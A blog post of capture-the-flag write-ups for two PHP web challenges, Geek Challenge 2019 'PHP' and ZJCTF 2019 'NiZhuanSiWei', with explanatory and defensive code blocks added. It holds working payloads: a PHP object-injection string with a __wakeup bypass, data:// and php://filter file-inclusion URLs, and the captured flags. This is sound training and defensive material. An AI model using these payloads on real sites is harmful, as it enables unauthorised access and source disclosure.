BUUCTF-[Geek Challenge 2019]PHP

[Geek Challenge 2019] PHP

Problem


Solution

Open the challenge environment


The challenge description hints that the website has a backup, so try brute-forcing the website's directories.

Tool: dirmap


Directory brute-forcing turned up the website's backup file. Visit it, download it locally, and inspect its contents.


It contains flag.php, but opening it shows it is not what we want, so continue reading the other source files.


Some clues were found in the source code of index.php and class.php.

In index.php:

The select parameter is read via GET and its value is passed straight to unserialize().


In class.php:

Two properties, username and password, are defined.

private: private class members can only be accessed from inside the class in which they are defined.


source code:

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

When several magic methods such as __construct(), __wakeup() and __destruct() appear together, deserialization is almost certainly involved. From the code above we also know that index.php reads select via GET.

Supplement:
Commonly used magic methods:
__construct(): initializes the object on creation; called when an object is created
__wakeup(): triggered by unserialize()  // deserialization
__sleep(): triggered by serialize()  // serialization
__destruct(): cleans up the object at the end; called when an object is destroyed

Looking at class.php in turn, it mainly checks two conditions: username must be admin and password must be 100.

Next, build the serialized string: instantiate the class and serialize it.

Construct payload:


code:

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
$name = new Name;
print(serialize($name));
// echo works as well:
// echo serialize($name);
?>

Output:


Replace each box with %00. The box is a null byte, which cannot be carried in the URL as-is; if it is simply dropped, the string becomes shorter than the declared length and the payload no longer works:

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

But there is another method, __wakeup(), which resets username to "guest", so we need a way to bypass __wakeup().

When a serialized string is deserialized and the declared number of properties is greater than the actual number, execution of __wakeup() is skipped.
Original: O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
Bypass: O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

That is:

Bypass:
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
payload:
index.php?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
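The following script is an added example, not code from the writeup or from the challenge. It generates the same payload with serialize() and urlencode() instead of hand-editing null bytes, tries the property-count trick locally, and then shows the unserialize() call a defender would use so that no class from class.php is ever instantiated from request data. The class mirrors the challenge's Name class; the getter methods and the test values are my additions. Note that the property-count bypass only skips __wakeup() on PHP older than 5.6.25 / 7.0.10 (CVE-2016-7124); on patched versions unserialize() rejects the string and returns false.

```php
<?php
// Added example (not from the original writeup): build the deserialization
// payload programmatically, observe the __wakeup() property-count behaviour
// on the local PHP version, and show the defender's unserialize() call.

class Name {
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }

    // Same reset as the challenge's class.php, so the bypass can be observed.
    public function __wakeup() {
        $this->username = 'guest';
    }

    // Getters are an addition; the challenge's class has none.
    public function getUsername() { return $this->username; }
    public function getPassword() { return $this->password; }
}

// 1. serialize() writes private properties as "\0Name\0username"; the \0 bytes
//    are the boxes in the writeup's screenshot. urlencode() turns them into
//    %00 (and quotes into %22), so the string survives a query string intact.
$obj = new Name('admin', 100);
$serialized = serialize($obj);
echo "raw:     " . str_replace("\0", '\0', $serialized) . "\n";
echo "encoded: " . urlencode($serialized) . "\n";

// 2. Property-count trick: declare 3 properties while only 2 are present.
//    PHP < 5.6.25 / 7.0.10 skips __wakeup() and keeps username=admin;
//    patched PHP fails the parse and returns false (notice suppressed here).
$bypass = preg_replace('/^O:4:"Name":2:/', 'O:4:"Name":3:', $serialized);
$restored = @unserialize($bypass);
if ($restored instanceof Name) {
    echo "vulnerable PHP: username=" . $restored->getUsername() . "\n";
} else {
    echo "patched PHP: unserialize() returned false\n";
}

// 3. Defender's call (PHP >= 7.0): with allowed_classes=false the payload is
//    rebuilt as __PHP_Incomplete_Class, so neither __wakeup() nor __destruct()
//    of Name can run, regardless of the declared property count.
$safe = unserialize($serialized, ['allowed_classes' => false]);
var_dump(get_class($safe) === '__PHP_Incomplete_Class');  // bool(true)
```

Running the script on a current PHP prints the raw and %00-encoded strings, reports that the bypass string was rejected, and confirms that the guarded unserialize() yields an incomplete class object rather than a Name instance.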


Successfully obtained the flag

The flag of this question is:

flag{b18bb0c2-8084-4e65-a402-f1803a87f80d}

[ZJCTF 2019] NiZhuanSiWei

Problem


Solution

Open the challenge environment


The page displays its own source code. On analysis there are three parameters, text, file and password, all passed via GET. In the first if statement, text must be set and the file it names is read; the contents must equal "welcome to the zjctf" for the check to return true.

Next, use the data:// stream wrapper (the file-inclusion pseudo-protocol) to construct the payload.

payload:
?text=data://text/plain,welcome to the zjctf


In the second if statement, the word flag is filtered out of the file parameter by a regular expression, so any file value containing flag is rejected. The next line includes the file, so we try to read the source of useless.php to see what it holds, and construct the payload again.

The php://filter wrapper is used with the file inclusion to read the source code.

payload:
?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php


The retrieved output is base64-encoded, so decode it next.

After decoding we get the following code:


<?php

class Flag{  //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>

The initial source code deserializes the password parameter, so we serialize an object of the class we just decoded, assign the result to password, and let the page deserialize it.

unserialize() takes an object or array serialized by serialize() and restores the original object structure.


Serialization processing:

<?php

class Flag{  //flag.php
    public $file="flag.php";  // flag.php must be assigned to $file
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
$passwd = new Flag;
echo serialize($passwd);

?>

The output is:

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}


Construct the payload again:

The password parameter is deserialized:
/?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

After the request completes, view the page:


View the source code of the web page:


Successfully obtained flag information

The flag of this question is:

flag{1b3bf4a9-e129-4477-9e99-e9bc49c2d3c3}

Summary:

First: after opening the challenge environment, read the source code and note the parameters we need to supply. They are passed via GET, so they can be manipulated directly in the URL (HackBar). From the code analysis, the data:// file-inclusion wrapper is needed to supply the data, which the function reads and compares for equality.
Second: the function in the if statement shows that flag is filtered out by a regular expression, so the flag file cannot be requested directly. Following the hint in the source, read the source of useless.php instead; this again needs the php://filter file-inclusion wrapper, which returns the source base64-encoded. Decode it to get the code.
Looking at the password parameter in the source reveals that it is deserialized. Build the serialized object from the decoded source and let the password parameter deserialize it.
Note: unserialize() takes an object or array serialized by serialize() and restores the original object structure.
Third: construct the payload and get the flag.
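As an added example, not part of the writeup or the challenge, here is how the request handling in this challenge would look if it were written defensively: the file-name parameters refuse every stream wrapper (data://, php://filter, phar://) and any path traversal, the text check compares the parameter itself instead of reading whatever the parameter points to, and password is parsed as JSON rather than passed to unserialize(), so no __toString(), __wakeup() or __destruct() can be triggered by request data. The parameter names text, file, password and the file name useless.php are the challenge's; safe_local_path(), text_is_valid(), parse_password() and the temporary base directory are assumptions made for this example.

```php
<?php
// Added example (not from the original writeup): a hardened counterpart to the
// NiZhuanSiWei request handling. Helper names and the base directory are
// assumptions; parameter names mirror the challenge.

// Accept only a plain file name that resolves inside $baseDir. This rejects
// stream wrappers (data:, php:, phar:, ...), traversal and null bytes at once.
function safe_local_path(string $userInput, string $baseDir): ?string {
    // A scheme prefix means a stream wrapper, never a local file name.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userInput)) {
        return null;
    }
    // No directory separators and no null bytes in a bare file name.
    if (strpbrk($userInput, "\0/\\") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $userInput);
    if ($base === false || $full === false) {
        return null;   // base missing, or the file does not exist
    }
    // realpath() has resolved symlinks on both sides, so a prefix check holds.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// The challenge compares file_get_contents($text) with a constant, which is
// why data://text/plain,... satisfies it. Compare the parameter itself.
function text_is_valid(?string $text): bool {
    return $text === 'welcome to the zjctf';
}

// Structured input as JSON with an explicit key allowlist; json_decode() never
// instantiates classes, so no magic method can run from this input.
function parse_password(?string $password): ?array {
    if ($password === null) {
        return null;
    }
    $decoded = json_decode($password, true);
    if (!is_array($decoded) || array_keys($decoded) !== ['file']) {
        return null;
    }
    return $decoded;
}

// Constructed inputs that mirror the writeup's payloads, plus one legitimate
// file name. A stub useless.php is created in the temp dir so it resolves.
$baseDir = sys_get_temp_dir();
$stub = $baseDir . DIRECTORY_SEPARATOR . 'useless.php';
file_put_contents($stub, "<?php\n");

$inputs = [
    'data://text/plain,welcome to the zjctf',
    'php://filter/read=convert.base64-encode/resource=useless.php',
    '../flag.php',
    'useless.php',
];
foreach ($inputs as $in) {
    $path = safe_local_path($in, $baseDir);
    printf("%-62s => %s\n", $in, $path === null ? 'rejected' : $path);
}
unlink($stub);

var_dump(text_is_valid('data://text/plain,welcome to the zjctf'));   // bool(false)
var_dump(text_is_valid('welcome to the zjctf'));                     // bool(true)
var_dump(parse_password('O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}')); // NULL
var_dump(parse_password('{"file":"useless.php"}'));                  // array(1) { ["file"]=> string(11) "useless.php" }
```

Only the bare useless.php name is accepted and returned as a resolved path; the data://, php://filter and ../ inputs are rejected before any file access, and the serialized Flag object is refused by the JSON parser rather than being turned into an object with a __toString() that reads files.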

If anything in this article is wrong, criticism and corrections are welcome!


Origin blog.csdn.net/rumil/article/details/131450999